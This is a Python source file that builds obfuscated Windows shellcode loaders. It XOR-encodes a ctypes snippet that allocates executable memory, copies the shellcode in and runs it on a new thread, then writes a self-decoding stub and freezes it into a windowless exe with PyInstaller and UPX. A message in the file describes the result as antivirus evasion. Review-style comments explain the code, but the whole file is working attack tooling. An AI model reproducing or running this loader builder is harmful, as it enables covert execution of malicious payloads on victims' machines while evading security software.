import subprocess
import random
import string
import shutil
import os
# File name of the generated loader stub: code_x32_x64() overwrites it, and
# py2exe() passes it to PyInstaller and then deletes it from the working dir.
pyname = "shellcode.py"
def get_random_keys():
    """Return an 8-character key drawn from ASCII letters and digits.

    Each position is an independent ``random.randint`` draw over the same
    alphabet.  This is the ``random`` module, not ``secrets``: the value is as
    predictable as the global RNG state, which is acceptable here only because
    it serves as an obfuscation seed that ends up embedded in the stub anyway.
    """
    alphabet = string.ascii_letters + string.digits
    last_index = len(alphabet) - 1
    return ''.join(alphabet[random.randint(0, last_index)] for _ in range(8))
# Dead code: this is a bare module-level string, not a function definition.
# The identical payload_decode body is embedded in the stub template inside
# code_x32_x64(); this copy only documents how the stub undoes payload_encode().
"""
def payload_decode(funcs,keys):
    func_codes = ''
    random.seed(keys)
    func_code = funcs.split(',')
    for item in func_code:
        item = int(item)
        func_codes += chr(item ^ random.randint(0, 255))
    return func_codes
"""
def payload_encode(payload,keys):
    """Obfuscate *payload* into a comma-separated list of XORed code points.

    ``random`` is seeded with *keys* and every character of *payload* is XORed
    with the next ``randint(0, 255)`` draw, so the whole "keystream" is fixed
    by *keys*.  The stub written by code_x32_x64() re-seeds with the same key
    and reverses the operation.  This defeats static string matching only; it
    is not encryption, since the key travels in clear inside the stub.

    Args:
        payload: the Python snippet to obfuscate (see create_payload()).
        keys: seed string, normally from get_random_keys().

    Returns:
        A string such as ``"12,203,7"``; an empty payload yields ``""``.

    Side effect: re-seeds the module-level ``random`` state.
    """
    random.seed(keys)
    funcs = ""
    for item in payload:
        funcs += str(ord(item) ^ random.randint(0, 255)) + ','
    funcs = funcs.strip(',')  # drop the trailing separator
    return funcs
def code_x32_x64(arch,keys,funcs,shellcode):
    """Write the loader stub ``pyname`` that PyInstaller later packages.

    The stub carries its own copy of payload_decode() (seed ``random`` with
    *keys*, XOR each comma-separated value with the next ``randint(0, 255)``
    draw), decodes *funcs* back into the ctypes snippet selected in
    create_payload() and hands the result to ``exec()`` with ``shellcode`` in
    scope.  For anyone analysing the output, the stub therefore contains in
    clear text: the key, the encoded blob, the decoder and the interpolated
    shellcode value.

    Args:
        arch: 32 or 64; only used to name the stub's ``run_<arch>`` function.
        keys: seed string from get_random_keys().
        funcs: output of payload_encode().
        shellcode: interpolated with ``format()`` into ``shellcode = ...``;
            presumably a ``bytes`` object whose ``str()`` form is a valid
            literal — TODO confirm against the caller.

    Side effects: overwrites ``pyname`` in the current directory.  The file
    object returned by ``open()`` is never closed explicitly.
    """
    # Compose the execution script and write it to a file.
    code = f"""import ctypes
import random
def payload_decode(funcs,keys):
    func_codes = ''
    random.seed(keys)
    func_code = funcs.split(',')
    for item in func_code:
        item = int(item)
        func_codes += chr(item ^ random.randint(0, 255))
    return func_codes
def run_{arch}(shellcode):
    funcs = "{funcs}"
    func = payload_decode(funcs,"{keys}")
    exec(func)
shellcode = {shellcode}
run_{arch}(shellcode)
"""
    open(pyname,'w',encoding='utf-8').write(code)
def clean_output():
    """Reset ``output/`` to an empty directory and report success.

    The directory must already exist: ``shutil.rmtree`` raises
    ``FileNotFoundError`` when it does not, and nothing here catches that.
    """
    out_dir = 'output/'
    shutil.rmtree(out_dir)
    os.mkdir(out_dir)
    print('[+] 清理输出文件成功')
def py2exe(name,icon='exeLogo.ico'):
    """Package the stub ``pyname`` into ``output/<name>.exe`` with PyInstaller.

    Args:
        name: basename of the resulting exe (create_payload() passes the key).
        icon: path to an .ico file; applied only if the path exists.

    Review notes:
      * The build command is one string run with ``shell=True`` and *icon* is
        appended unquoted, so a path containing spaces or shell metacharacters
        is interpreted by the shell instead of reaching PyInstaller verbatim;
        a list argument with ``shell=False`` would pass it through unchanged.
      * Under ``shell=True`` ``subprocess.call`` does not raise when the
        command is missing — it returns a non-zero status that is ignored, so
        the "check pyinstaller" branch is mostly unreachable and a failed build
        falls through to the second ``try`` block.
      * ``exit()`` is the ``site`` helper rather than ``sys.exit``.
      * Indentation was reconstructed for this listing; the clean-up lines are
        placed inside the ``os.path.exists`` test — TODO confirm upstream.
    """
    # Use PyInstaller to convert the python file to an exe.
    # -F one-file, -w no console; expects a local ``upx-4.0.1`` directory.
    cmd = f"pyinstaller -F -w {pyname} --distpath output --specpath tempdir --workpath tempdir --clean -y --upx-dir upx-4.0.1"
    if icon != None and os.path.exists(icon):  # PEP 8 would use ``is not None``
        icon = os.path.abspath(icon)
        cmd += f" --icon {icon}"  # unquoted interpolation, see docstring
    print('[*] Cmdline:',cmd)
    try:
        subprocess.call(cmd,shell=True)
    except Exception as e:
        # Message (zh): "please check whether pyinstaller is installed"
        print(f'{e}\n[-] 请检查 pyinstaller 是否安装')
        exit()
    try:
        # PyInstaller names the exe after the stub, i.e. output/shellcode.exe.
        file = f"output/{pyname.split('.')[0]}.exe"
        newfile = f"output/{name}.exe"
        if os.path.exists(file):
            print('========================')
            # Remove the clear-text stub and PyInstaller's spec/work directory.
            os.remove(pyname)
            shutil.rmtree('tempdir/')
            print('[*] 文件清理完毕')  # "file clean-up finished"
            shutil.move(file,newfile)
            # "exe built → <path>, file copied to clipboard"
            print(f'[+] exe生成完毕 → {newfile} 已将文件复制至剪切板!')
            # Windows-only: puts the file item on the clipboard via PowerShell;
            # ``newfile`` is string-interpolated into the command like above.
            subprocess.Popen(args=['powershell',f'Get-Item {newfile} | Set-Clipboard'])
    except Exception as e:
        print(f'[*] Something went wrong\n{e}')
        exit()
def create_payload(arch,shellcode,icon=None):
    """Build an obfuscated loader exe for *shellcode* (the script's entry point).

    Pipeline: choose the 32- or 64-bit ctypes snippet below, XOR-encode it with
    a fresh key (payload_encode), write the self-decoding stub (code_x32_x64)
    and hand that to PyInstaller (py2exe).  Both snippets follow the same
    sequence, which is what an analyst sees once the stub is decoded:
    ``VirtualAlloc`` with protection ``0x40`` (PAGE_EXECUTE_READWRITE),
    ``RtlMoveMemory`` of the buffer into that region, ``CreateThread`` on it
    and ``WaitForSingleObject(..., -1)`` — an RWX-allocate / copy / thread
    pattern executed from within a PyInstaller-frozen interpreter.

    Args:
        arch: 32 or 64.  Any other value leaves ``funcs`` unassigned and the
            ``code_x32_x64`` call raises ``NameError`` — there is no ``else``.
        shellcode: forwarded unchanged to code_x32_x64(); see its docstring.
        icon: optional .ico path forwarded to py2exe(); otherwise py2exe's
            default ``'exeLogo.ico'`` applies.

    Side effects: writes ``pyname`` and ``output/<key>.exe``, prints the key
    and cipher, and always ends with ``'Convert successfully!'`` because
    py2exe() returns normally even when no exe was produced.

    32-bit payload
    """
    # 32-bit variant: every pointer goes through ``ctypes.c_int``, which
    # truncates a 64-bit address; ``0x3000`` is MEM_COMMIT | MEM_RESERVE.
    payload_32 = 'shellcode = bytearray(shellcode);rwxpage = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40));buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(rwxpage),buf,ctypes.c_int(len(shellcode)));ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(rwxpage),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))),ctypes.c_int(-1))'
    # Bare string statement (not a docstring): "64-bit payload".
    """
    64位的payload
    """
    # 64-bit variant: sets ``VirtualAlloc.restype`` to ``c_uint64`` so the
    # returned address is not truncated; ``0x1000`` is MEM_COMMIT only.
    payload_64 = 'ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64;rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode));ctypes.windll.kernel32.WaitForSingleObject(ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0), -1)'
    keys = get_random_keys()
    if arch == 32:
        funcs = payload_encode(payload_32,keys)
    elif arch == 64:
        funcs = payload_encode(payload_64,keys)
    # NOTE(review): no ``else`` — an unsupported *arch* reaches the next call
    # with ``funcs`` unbound.
    code_x32_x64(arch,keys,funcs,shellcode)
    print('参数信息:')  # "parameter info"
    print(f'[+] Cipher: {funcs}\n[+] Keys: {keys}\n\n========================')
    # Message (zh): the exe's bitness follows the machine/interpreter running
    # this script, so a 32-bit build must be produced on a 32-bit system.
    print('注意:生成的exe的操作系统是根据当前运行脚本的电脑操作系统所决定,生成32位的shellcode注意要用32位的电脑运行。\n[*] Convert shellcode.py to exe......\n免杀制作完成,转换exe中\n')
    if icon:
        py2exe(keys,icon)  # the exe is named after the key string
    else:
        py2exe(keys)
    print('Convert successfully!')